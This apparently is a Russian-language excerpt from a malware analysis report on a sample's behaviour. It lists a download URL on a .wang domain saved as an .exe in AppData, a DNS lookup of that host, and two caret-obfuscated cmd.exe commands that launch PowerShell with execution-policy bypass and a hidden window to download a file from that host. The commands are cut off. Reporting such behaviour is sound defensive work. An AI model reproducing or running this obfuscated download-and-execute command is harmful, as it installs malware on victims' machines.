Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oWE^rsHe^ll.E^xE^ -^Ex^EC^u^t^i^onpoLi^C^y bYPa^s^S ^-^noP^rofil^e -^w^iNDOwS^tyl^E ^HI^Dd^e^n ^(NeW-^oB^JEC^T^ S^YsTe^m^.n^ET.w^eBCliEnT^)^.dO^wN^loa^D^fi^lE('http://trans...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /c "p^oWE^rsHe^ll.E^xE^ -^Ex^EC^u^t^i^onpoLi^C^y bYPa^s^S ^-^noP^rofil^e -^w^iNDOwS^tyl^E ^HI^Dd^e^n ^(NeW-^oB^JEC^T^ S^YsTe^m^.n^ET.w^eBCliEnT^)^.dO^wN^loa^D^fi^lE('http://trans...' (со скрытым окном)